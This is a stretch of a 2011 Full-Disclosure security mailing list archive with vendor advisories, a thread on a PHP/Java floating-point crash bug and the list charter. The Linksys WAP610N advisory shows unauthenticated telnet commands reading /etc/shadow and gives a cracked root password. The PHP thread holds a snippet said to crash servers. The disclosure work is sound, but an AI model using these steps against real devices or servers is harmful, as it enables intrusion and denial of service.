mes5/x86_64/krb5-pkinit-openssl-1.8.1-0.4mdvmes5.1.x86_64.rpm da836bd502a81c68e486a59e0dc59576 mes5/x86_64/krb5-server-1.8.1-0.4mdvmes5.1.x86_64.rpm 1b4f41d239d1e17b460711961a4be093 mes5/x86_64/krb5-server-ldap-1.8.1-0.4mdvmes5.1.x86_64.rpm 0f63908285e6aba326b1af6b40456385 mes5/x86_64/krb5-workstation-1.8.1-0.4mdvmes5.1.x86_64.rpm a8d6ded793ecdfd542557a2ce625f212 mes5/x86_64/lib64krb53-1.8.1-0.4mdvmes5.1.x86_64.rpm 3ad9fe51b83ba903dd347aae73bd8e09 mes5/x86_64/lib64krb53-devel-1.8.1-0.4mdvmes5.1.x86_64.rpm f3636ce525a3743da670335fad739b4d mes5/SRPMS/krb5-1.8.1-0.4mdvmes5.1.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of
[Full-disclosure] Drupal Data Module Multiple Vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Description of Vulnerability: Drupal (http://drupal.org) is a robust content management system (CMS) written in PHP and MySQL. The Drupal Data module (http://drupal.org/project/data) helps you model, manage and query related sets of tables. It offers an administration interface and a low level API for manipulating tables and accessing their contents. The Data module contains multiple Cross Site Scripting (XSS) vulnerabilities because it fails to sanitize table descriptions, field names or labels before display. This results in multiple stored XSS as well as DOM based XSS vulnerabilities. Drupal site users with the ability to create or edit tables using the Data module could inject arbitrary HTML into administrative pages. The Data module also contains numerous SQL injection vulnerabilities because it fails to sanitize values for table names or column names before invoking SQL statements. This allows users with the ability to create or edit tables managed by the Data module to perform SQL injection attacks. Systems affected: Drupal 6.20 with Data 6.x-1.0-alpha14 was tested and shown to be vulnerable. Impact User could inject arbitrary scripts into pages affecting site users. This could result in administrative account compromise leading to web server process compromise. A more likely scenario would be for an attacker to inject hidden content (such as iframes, applets, or embedded objects) that would attack client browsers in an attempt to compromise site users' machines. This vulnerability could also be used to launch cross site request forgery (XSRF) attacks against the site that could have other unexpected consequences. Mitigating factors: In order to exploit this vulnerability the attacker must have credentials to an authorized account that has been assigned the permissions to administer or edit in the Data module. This could be accomplished via social engineering, brute force password guessing, or abuse or legitimate credentials. Vendor response: Drupal security team does not handle issues with pre-release versions of modules (such as alpha or dev). These issues were reported in the module's public issue queue (http://drupal.org/node/1056470). The text of this advisory has also been posted at http://www.madirish.net/?article=480 - -- Justin C. Klein Keane http://www.MadIrish.net The digital signature on this message can be confirmed using the public key at http://www.madirish.net/gpgkey -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.11 (GNU/Linux) Comment: Using GnuPG with Fedora - http://enigmail.mozdev.org/ iPwEAQECAAYFAk1S0Y0ACgkQkSlsbLsN1gBxpAcApo+e7x2yhchgc9zZOd2YVqVK nBt09nmIaQem+dO4fs9l+rQbbMj8ahFJMUH8W82iSRuDQQyhnRF5JTCWMlC3gij5 HbOaxLEkepxFzRkDuRdR/wsraSMsxYBJuRdrG8OM7riuFVSSpM2NIdZXjsX7RIJ1 YTNxCkKT6lMywvc7T4A3e3BQPhIKwceB1HhYuyMcWAZ8oMh69HvTlKQ2A5r8QH/S exJ4ML4nBY9f+0yE1x4DqtsGl54PPdCwW9shu1FPIr0URtPq21/9ozMFwZRBFuOg v+lB2+O0+9gMCjQrcLw= =lrWV -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] {Java,PHP} Server Exploits
http://developers.slashdot.org/story/11/02/09/025237/Java-Floating-Point-Bug-Can-Lock-Up-Servers http://it.slashdot.org/story/11/01/06/1820208/PHP-Floating-Point-Bug-Crashes-Server ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] {Java,PHP} Server Exploits
Was it fixed? What's the current status? The sounds like a major issue, and the lack of info about it is darn impressive. I tried it on my test Windows WAMP server: ?php ob_implicit_flush(true); echo 'Start test...br/'; $f=(float)2.2250738585072011e-308; echo 'Try 1 = '.$f.'/br'; $f=floatval(2.2250738585072011e-308); echo 'Try 2 = '.$f.'/br'; $f=2.2250738585072011e-308; echo 'Try 3 = '.(float)$f.'/br'; echo 'Test failed, server not vulnerable!/br'; ? All three tests succeeded in crashing the server. With all due respect, this should NOT have been disclosed without being FIXED (as it seems to me). Plus, I'm a bit amazed such a bug exists in PHP - since converting to floating point is a trivial operation, it should have been limited and safe-guarded from the start. There are a lot of servers out there happily accepting input as floating point values, this bug should be top priority... Chris. On Wed, Feb 9, 2011 at 6:40 PM, Leon Kaiser litera...@gmail.com wrote: http://developers.slashdot.org/story/11/02/09/025237/Java-Floating-Point-Bug-Can-Lock-Up-Servers http://it.slashdot.org/story/11/01/06/1820208/PHP-Floating-Point-Bug-Crashes-Serverhttp://it.slashdot.org/story/11/01/06/1820208/PHP-Floating-Point-Bug-Crashes-Servers ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] {Java,PHP} Server Exploits
Ah, been reading more about it, seems it was fixed. Still, there should have been safeguards around this - I'm thinking they should check existing conversion routines to ensure they're safe... On Wed, Feb 9, 2011 at 8:54 PM, Christian Sciberras uuf6...@gmail.comwrote: Was it fixed? What's the current status? The sounds like a major issue, and the lack of info about it is darn impressive. I tried it on my test Windows WAMP server: ?php ob_implicit_flush(true); echo 'Start test...br/'; $f=(float)2.2250738585072011e-308; echo 'Try 1 = '.$f.'/br'; $f=floatval(2.2250738585072011e-308); echo 'Try 2 = '.$f.'/br'; $f=2.2250738585072011e-308; echo 'Try 3 = '.(float)$f.'/br'; echo 'Test failed, server not vulnerable!/br'; ? All three tests succeeded in crashing the server. With all due respect, this should NOT have been disclosed without being FIXED (as it seems to me). Plus, I'm a bit amazed such a bug exists in PHP - since converting to floating point is a trivial operation, it should have been limited and safe-guarded from the start. There are a lot of servers out there happily accepting input as floating point values, this bug should be top priority... Chris. On Wed, Feb 9, 2011 at 6:40 PM, Leon Kaiser litera...@gmail.com wrote: http://developers.slashdot.org/story/11/02/09/025237/Java-Floating-Point-Bug-Can-Lock-Up-Servers http://it.slashdot.org/story/11/01/06/1820208/PHP-Floating-Point-Bug-Crashes-Serverhttp://it.slashdot.org/story/11/01/06/1820208/PHP-Floating-Point-Bug-Crashes-Servers ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] {Java,PHP} Server Exploits
Christian, this issue has been 'floating' around for several months now. On Wed, Feb 9, 2011 at 7:56 PM, Christian Sciberras uuf6...@gmail.comwrote: Ah, been reading more about it, seems it was fixed. Still, there should have been safeguards around this - I'm thinking they should check existing conversion routines to ensure they're safe... On Wed, Feb 9, 2011 at 8:54 PM, Christian Sciberras uuf6...@gmail.comwrote: Was it fixed? What's the current status? The sounds like a major issue, and the lack of info about it is darn impressive. I tried it on my test Windows WAMP server: ?php ob_implicit_flush(true); echo 'Start test...br/'; $f=(float)2.2250738585072011e-308; echo 'Try 1 = '.$f.'/br'; $f=floatval(2.2250738585072011e-308); echo 'Try 2 = '.$f.'/br'; $f=2.2250738585072011e-308; echo 'Try 3 = '.(float)$f.'/br'; echo 'Test failed, server not vulnerable!/br'; ? All three tests succeeded in crashing the server. With all due respect, this should NOT have been disclosed without being FIXED (as it seems to me). Plus, I'm a bit amazed such a bug exists in PHP - since converting to floating point is a trivial operation, it should have been limited and safe-guarded from the start. There are a lot of servers out there happily accepting input as floating point values, this bug should be top priority... Chris. On Wed, Feb 9, 2011 at 6:40 PM, Leon Kaiser litera...@gmail.com wrote: http://developers.slashdot.org/story/11/02/09/025237/Java-Floating-Point-Bug-Can-Lock-Up-Servers http://it.slashdot.org/story/11/01/06/1820208/PHP-Floating-Point-Bug-Crashes-Serverhttp://it.slashdot.org/story/11/01/06/1820208/PHP-Floating-Point-Bug-Crashes-Servers ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] {Java,PHP} Server Exploits
On Wed, 09 Feb 2011 20:54:41 +0100, Christian Sciberras said: $f=floatval(2.2250738585072011e-308); echo 'Try 2 = '.$f.'/br'; Plus, I'm a bit amazed such a bug exists in PHP - since converting to floating point is a trivial operation, it should have been limited and safe-guarded from the start. Take a careful gander at that number, then go look at the floating point spec - it's a specific corner case that isn't obviously trivial to get right (doing floating point *right* is a lot harder than it looks - take a class on numerical methods sometime, you spend 75% of your time dealing with rounding errors in the last bit). Having said that, anybody writing floating point support for a package should probably google 'floating point paranoia' and learn what sort of things to test for. :) pgp55xZbdpFvk.pgp Description: PGP signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] {Java,PHP} Server Exploits
You've misread my statement, I didn't say floating point is trivial. I actually said securing a base data type is trivial. I'd give you credit if this was a complex issue in, say, deserializing some complex type, but not float. How many simple types does PHP have? Integer, float, string and boolean. Keep in mind that when we talk about floating point in PHP, we're talking about The Float (64bit || 32bit), not tens of different floating types ranging from 8 bits to 1024... Cheers, Chris. On Wed, Feb 9, 2011 at 9:13 PM, valdis.kletni...@vt.edu wrote: On Wed, 09 Feb 2011 20:54:41 +0100, Christian Sciberras said: $f=floatval(2.2250738585072011e-308); echo 'Try 2 = '.$f.'/br'; Plus, I'm a bit amazed such a bug exists in PHP - since converting to floating point is a trivial operation, it should have been limited and safe-guarded from the start. Take a careful gander at that number, then go look at the floating point spec - it's a specific corner case that isn't obviously trivial to get right (doing floating point *right* is a lot harder than it looks - take a class on numerical methods sometime, you spend 75% of your time dealing with rounding errors in the last bit). Having said that, anybody writing floating point support for a package should probably google 'floating point paranoia' and learn what sort of things to test for. :) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [SECURITY] [DSA-2158-1] cgiirc security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - Debian Security Advisory DSA-2158-1 secur...@debian.org http://www.debian.org/security/ Steve Kemp February 9, 2011 http://www.debian.org/security/faq - Package: cgiirc Vulnerability : cross-site scripting Problem type : local Debian-specific: no CVE ID : CVE-2011-0050 Michael Brooks (Sitewatch) discovered a reflective XSS flaw in cgiirc, a web based IRC client, which could lead to the execution of arbitrary javascript. For the old-stable distribution (lenny), this problem has been fixed in version 0.5.9-3lenny1. For the stable distribution (squeeze), and unstable distribution (sid), this problem will be fixed shortly. We recommend that you upgrade your cgiirc packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (GNU/Linux) iEYEARECAAYFAk1TB8gACgkQwM/Gs81MDZ3jaQCglAutQanent4qxHuBCtV5ycLz 2qoAn1ARj+1zU5rK64N0rlmA15VbUn8B =72nd -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] {Java,PHP} Server Exploits
Breakin' fuckin' news! (Or not!) One of those stories is over a month old,
the other is over a week old. Nothing particularly exciting or unexpected in
either. It's just typical GPL code quality.
From: litera...@gmail.com
To: full-disclosure@lists.grok.org.uk
Date: Wed, 9 Feb 2011 12:40:54 -0500
Subject: [Full-disclosure] {Java,PHP} Server Exploits
http://developers.slashdot.org/story/11/02/09/025237/Java-Floating-Point-Bug-Can-Lock-Up-Servers
http://it.slashdot.org/story/11/01/06/1820208/PHP-Floating-Point-Bug-Crashes-Server
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Linksys WAP610N Unauthenticated Root Consle
Secure Network - Security Research Advisory Vuln name: Linksys WAP610N Unauthenticated Access With Root Privileges Systems affected: WAP610N (Firmware Version: 1.0.01) Systems not affected: -- Severity: High Local/Remote: Remote Vendor URL: http://www.linksysbycisco.com Author(s): Matteo Ignaccolo m.ignacc...@securenetwork.it Vendor disclosure: 14/06/2010 Vendor acknowledged: 14/06/2010 Vendor bugfix: 14/12/2010 (reply to our request for update) Vendor patch release: ?? Public disclosure: 10/02/2010 Advisory number: SN-2010-08 Advisory URL: http://www.securenetwork.it/ricerca/advisory/download/SN-2010-08.txt *** SUMMARY *** Linksys WAP610N is a SOHO wireless access point supporting 802.11n draft. Unauthenticated remote textual administration console has been found that allow an attacker to run system command as root user. *** VULNERABILITY DETAILS *** telnet access-point IP Command system id Output uid=0(root) gid=0(root) Coomand system cat /etc/shadow Ouptup root:$1$ZAwqf2dI$ZukbihyQtUghNDsLAQaP31:10933:0:9:7::: Ouptup bin:*:10933:0:9:7::: Ouptup daemon:*:10933:0:9:7::: Ouptup adm:*:10933:0:9:7::: Ouptup lp:*:10933:0:9:7::: Ouptup sync:*:10933:0:9:7::: Ouptup shutdown:*:10933:0:9:7::: Ouptup halt:*:10933:0:9:7::: Ouptup uucp:*:10933 root password is wlan (cracked with MDcrack http://mdcrack.openwall.net) List of console's command: ATHENA_READ ATHENA_WRITE CHIPVAR_GET DEBUGTABLE DITEM DMEM DREG16 DREG32 DREG8 DRV_CAT_FREE DRV_CAT_INIT DRV_NAME_GET DRV_VAL_GET DRV_VAL_SET EXIT GENIOCTL GETMIB HELP HYP_READ HYP_WRITE HYP_WRITEBUFFER ITEM16 ITEM32 ITEM8 ITEMLIST MACCALIBRATE MACVARGET MACVARSET MEM_READ MEM_WRITE MTAPI PITEMLIST PRINT_LEVEL PROM_READ PROM_WRITE READ_FILE REBOOT RECONF RG_CONF_GET RG_CONF_SET RG_SHELL SETMIB SHELL STR_READ STR_WRITE SYSTEM TEST32 TFTP_GET TFTP_PUT VER *** EXPLOIT *** Attackers may exploit these issues through a common telnet client as explained above. *** FIX INFORMATION *** No patch is available. *** WORKAROUNDS *** Put access points on separate wired network and filter network traffic to/from tcp port. * *** LEGAL NOTICES *** * Secure Network (www.securenetwork.it) is an information security company, which provides consulting and training services, and engages in security research and development. We are committed to open, full disclosure of vulnerabilities, cooperating whenever possible with software developers for properly handling disclosure. This advisory is copyright 2009 Secure Network S.r.l. Permission is hereby granted for the redistribution of this alert, provided that it is not altered except by reformatting it, and that due credit is given. It may not be edited in any way without the express consent of Secure Network S.r.l. Permission is explicitly given for insertion in vulnerability databases and similars, provided that due credit is given to Secure Network. The information in the advisory is believed to be accurate at the time of publishing based on currently available information. This information is provided as-is, as a free service to the community by Secure Network research staff. There are no warranties with regard to this information. Secure Network does not accept any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information. If you have any comments or inquiries, or any issue with what is reported in this advisory, please inform us as soon as possible. E-mail: securenetw...@securenetwork.it GPG/PGP key: http://www.securenetwork.it/pgpkeys/Secure%20Network.asc Phone: +39 02 24 12 67 88 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] {Java,PHP} Server Exploits
It borders idiocy this hasn't been plugged.
Aerojam
--- On Wed, 2/9/11, Leon Kaiser litera...@gmail.com wrote:
From: Leon Kaiser litera...@gmail.com
Subject: [Full-disclosure] {Java,PHP} Server Exploits
To: full-disclosure@lists.grok.org.uk
Date: Wednesday, February 9, 2011, 5:40 PM
http://developers.slashdot.org/story/11/02/09/025237/Java-Floating-Point-Bug-Can-Lock-Up-Servers
http://it.slashdot.org/story/11/01/06/1820208/PHP-Floating-Point-Bug-Crashes-Server
-Inline Attachment Follows-
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] List Charter
[Full-Disclosure] Mailing List Charter John Cartwright jo...@grok.org.uk - Introduction Purpose - This document serves as a charter for the [Full-Disclosure] mailing list hosted at lists.grok.org.uk. The list was created on 9th July 2002 by Len Rose, and is primarily concerned with security issues and their discussion. The list is administered by John Cartwright. The Full-Disclosure list is hosted and sponsored by Secunia. - Subscription Information - Subscription/unsubscription may be performed via the HTTP interface located at http://lists.grok.org.uk/mailman/listinfo/full-disclosure. Alternatively, commands may be emailed to full-disclosure-requ...@lists.grok.org.uk, send the word 'help' in either the message subject or body for details. - Moderation Management - The [Full-Disclosure] list is unmoderated. Typically posting will be restricted to members only, however the administrators may choose to accept submissions from non-members based on individual merit and relevance. It is expected that the list will be largely self-policing, however in special circumstances (eg spamming, misappropriation) then offending members may be removed from the list by the management. An archive of postings is available at http://lists.grok.org.uk/pipermail/full-disclosure/. - Acceptable Content - Any information pertaining to vulnerabilities is acceptable, for instance announcement and discussion thereof, exploit techniques and code, related tools and papers, and other useful information. Gratuitous advertisement, product placement, or self-promotion is forbidden. Disagreements, flames, arguments, and off-topic discussion should be taken off-list wherever possible. Humour is acceptable in moderation, providing it is inoffensive. Politics should be avoided at all costs. Members are reminded that due to the open nature of the list, they should use discretion in executing any tools or code distributed via this list. - Posting Guidelines - The primary language of this list is English. Members are expected to maintain a reasonable standard of netiquette when posting to the list. Quoting should not exceed that which is necessary to convey context, this is especially relevant to members subscribed to the digested version of the list. The use of HTML is discouraged, but not forbidden. Signatures will preferably be short and to the point, and those containing 'disclaimers' should be avoided where possible. Attachments may be included if relevant or necessary (e.g. PGP or S/MIME signatures, proof-of-concept code, etc) but must not be active (in the case of a worm, for example) or malicious to the recipient. Vacation messages should be carefully configured to avoid replying to list postings. Offenders will be excluded from the mailing list until the problem is corrected. Members may post to the list by emailing full-disclosure@lists.grok.org.uk. Do not send subscription/ unsubscription mails to this address, use the -request address mentioned above. - Charter Additions/Changes - The list charter will be published at http://lists.grok.org.uk/full-disclosure-charter.html. In addition, the charter will be posted monthly to the list by the management. Alterations will be made after consultation with list members and a consensus has been reached. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
